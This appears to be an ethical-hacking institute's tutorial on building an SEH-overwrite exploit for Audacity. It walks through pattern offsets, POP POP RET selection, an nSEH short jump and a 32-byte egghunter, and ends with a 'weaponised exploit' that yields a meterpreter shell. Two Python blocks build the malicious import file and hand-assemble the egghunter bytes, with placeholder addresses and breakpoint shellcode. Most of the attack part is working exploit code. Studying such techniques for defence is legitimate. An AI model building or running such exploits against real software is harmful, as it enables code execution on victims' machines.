Advanced Ethical Hacking Institute in Pune
This is a standard SEH overflow: part of our user input sits on the stack a POP POP RET away from us. One thing to notice from the screenshot is that we sent a 2000-byte payload, yet by the time we return into our buffer it has been truncated, leaving roughly 80 bytes of room for shellcode (marked in blue). We use Immunity Debugger's !safeseh command to list the modules compiled without SafeSEH, from which a return address can be taken.
We copy the DLL over and search it for a POP POP RET instruction sequence with msfpescan.
Because we used pattern_create to build the initial buffer, we can now calculate the exact offset at which our data overwrites the exception handler.
We modify the exploit accordingly, replacing the pattern at that offset with a valid return address.
We then adjust the buffer so that, at the time of the crash, execution is redirected to our return address; the next-SEH field holds a short jump (\xEB) over the handler address, which lands us in a buffer of breakpoints (\xCC).
Once again we generate the exploit file, attach the debugger to Audacity and import the malicious file. This time the SEH handler should be overwritten with our address, the one that leads to the POP POP RET sequence. We set a breakpoint there, pass the exception to the program with Shift+F9 and step through the POP POP RET with F8.
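The offset calculation and the stage-1 buffer layout from the steps above, as an added example; this is not the author's exploit script (which the page only shows in screenshots) but a stand-alone reimplementation of the pattern_create/pattern_offset logic plus the junk | nSEH | SEH | breakpoints layout. The crash value 0x41307541, the offset 600, the POP POP RET address 0x10016D35 and the 80-byte breakpoint buffer are placeholders chosen for illustration, not values from the Audacity session.

```python
import string
import struct
from typing import Optional

# Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 3-byte triplet is unique
# for the first 20280 bytes, so a 4-byte slice seen in the SEH record maps back
# to exactly one offset in the buffer we sent.
def pattern_create(length: int) -> bytes:
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(dword: int, length: int) -> Optional[int]:
    """Offset of the little-endian DWORD `dword` (read from the debugger's SEH
    chain view) inside a pattern of `length` bytes, or None if it is not there."""
    idx = pattern_create(length).find(struct.pack("<I", dword))
    return None if idx < 0 else idx

# nSEH: jmp short +6. POP POP RET returns here; the jump skips the 2 remaining
# nSEH bytes plus the 4-byte handler address and lands on whatever follows.
NSEH = b"\xEB\x06\x90\x90"

def build_seh_buffer(seh_offset: int, ppr_addr: int, payload: bytes,
                     total_len: int) -> bytes:
    """Stage-1 layout: junk | nSEH | SEH (POP POP RET address) | payload | filler.
    `seh_offset` is the offset of the handler field, so nSEH sits 4 bytes earlier."""
    if seh_offset < 4:
        raise ValueError("handler offset must leave room for nSEH")
    buf = (b"A" * (seh_offset - 4)
           + NSEH
           + struct.pack("<I", ppr_addr)   # little-endian; bad bytes not handled here
           + payload)
    if len(buf) > total_len:
        raise ValueError("payload does not fit in the crash-length buffer")
    return buf + b"C" * (total_len - len(buf))

def layout(seh_offset: int, payload_len: int) -> dict:
    """Where each piece lands, for cross-checking against the debugger's stack view."""
    return {"nseh": seh_offset - 4, "seh": seh_offset,
            "payload": seh_offset + 4, "payload_end": seh_offset + 4 + payload_len}

if __name__ == "__main__":
    crash_len = 2000
    seen = 0x41307541            # placeholder: DWORD shown in the SEH handler slot
    off = pattern_offset(seen, crash_len)
    ppr = 0x10016D35             # placeholder POP POP RET address, not a real one
    buf = build_seh_buffer(off, ppr, b"\xCC" * 80, crash_len)
    print(off, layout(off, 80), len(buf))
    with open("evil.gro", "wb") as fh:   # constructed output file name
        fh.write(buf)
```

Keep the total length equal to the length that produced the crash: a shorter or longer file can change what gets truncated and where the handler record lands.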
Implementing the MSF egghunter is straightforward:
The final exploit looks like this:
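The egghunter stage and the final file layout, as an added example that is not the author's exploit (the page shows it only as a screenshot). The hunter is the well-known 32-byte int 0x2e egghunter from skape's paper, the same design Metasploit's egghunter generator produces for Windows; the tag w00t, the 80-byte window, the offset 600 and the handler address 0x10016D35 are placeholders, and the `hunt` function is a software model of the search loop so the page's "searches memory for the egg" behaviour can be exercised offline against a constructed address space.

```python
import struct
from typing import Optional, Set

PAGE = 0x1000
TAG = b"w00t"                 # 4-byte tag; the egg in memory is the tag twice
WINDOW = 80                   # usable bytes after the SEH record (from the debugger)
NSEH = b"\xEB\x06\x90\x90"    # jmp short +6 over the handler address

def egghunter(tag: bytes) -> bytes:
    """32-byte int 0x2e egghunter: walks memory, lets the kernel report whether
    [edx] is readable, and compares 8 bytes against tag+tag. Ends with jmp edi,
    which points just past the egg, i.e. at the real shellcode."""
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes")
    parts = [
        b"\x66\x81\xca\xff\x0f",  # or  dx, 0x0fff   ; last byte of the current page
        b"\x42",                  # inc edx          ; next page / next address
        b"\x52",                  # push edx
        b"\x6a\x02",              # push 0x02
        b"\x58",                  # pop eax          ; syscall number 2
        b"\xcd\x2e",              # int 0x2e         ; kernel probes the address
        b"\x3c\x05",              # cmp al, 0x05     ; 0xC0000005 = access violation
        b"\x5a",                  # pop edx
        b"\x74\xef",              # je  -0x11        ; unreadable: skip the page
        b"\xb8" + tag,            # mov eax, tag
        b"\x8b\xfa",              # mov edi, edx
        b"\xaf",                  # scasd            ; first copy of the tag?
        b"\x75\xea",              # jnz -0x16        ; no: try the next address
        b"\xaf",                  # scasd            ; second copy?
        b"\x75\xe7",              # jnz -0x19
        b"\xff\xe7",              # jmp edi          ; land right after the egg
    ]
    return b"".join(parts)

def build_file(seh_offset: int, ppr_addr: int, shellcode: bytes,
               total_len: int = 2000) -> bytes:
    """Stage 1 (the ~80 bytes the handler returns into) carries only the hunter;
    the egg and the real shellcode sit later in the file."""
    hunter = egghunter(TAG)
    if len(hunter) > WINDOW:
        raise ValueError("hunter does not fit in the truncated window")
    stage1 = (b"A" * (seh_offset - 4) + NSEH + struct.pack("<I", ppr_addr)
              + hunter + b"\x90" * (WINDOW - len(hunter)))
    buf = stage1 + TAG * 2 + shellcode
    if len(buf) > total_len:
        raise ValueError("egg + shellcode does not fit in the crash buffer")
    return buf + b"D" * (total_len - len(buf))

def hunt(memory: bytes, unmapped_pages: Set[int], tag: bytes) -> Optional[int]:
    """Model of the hunter's loop: step one address at a time, skip a whole page
    when it is unmapped, stop at tag+tag and return the address after it."""
    egg = tag * 2
    addr = 0
    while addr + len(egg) <= len(memory):
        if addr // PAGE in unmapped_pages:
            addr = (addr | 0x0FFF) + 1      # or dx,0x0fff ; inc edx
            continue
        if memory[addr:addr + len(egg)] == egg:
            return addr + len(egg)          # jmp edi
        addr += 1
    return None

def place_in_memory(buf: bytes, base: int, size: int) -> bytes:
    """Constructed address space: zeros except for `buf` copied in at `base`."""
    mem = bytearray(size)
    mem[base:base + len(buf)] = buf
    return bytes(mem)

if __name__ == "__main__":
    seh_offset, ppr = 600, 0x10016D35     # placeholders from the earlier stages
    shellcode = b"\xCC" * 16              # stand-in for the real payload
    f = build_file(seh_offset, ppr, shellcode)
    mem = place_in_memory(f, base=0x3000, size=0x5000)
    landing = hunt(mem, unmapped_pages={1}, tag=TAG)
    print(hex(landing), mem[landing:landing + 16] == shellcode)
```

Two checks worth keeping in a real exploit: the hunter must fit in the truncated window (32 of the 80 bytes here), and the egg must not also appear inside the hunter itself, which is why the tag is embedded only once in the code and doubled only in the egg.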
We run the final exploit under the debugger to make sure everything is in order. The egghunter is implemented correctly and works as expected.
We generate our final weaponised exploit:
And get a meterpreter shell!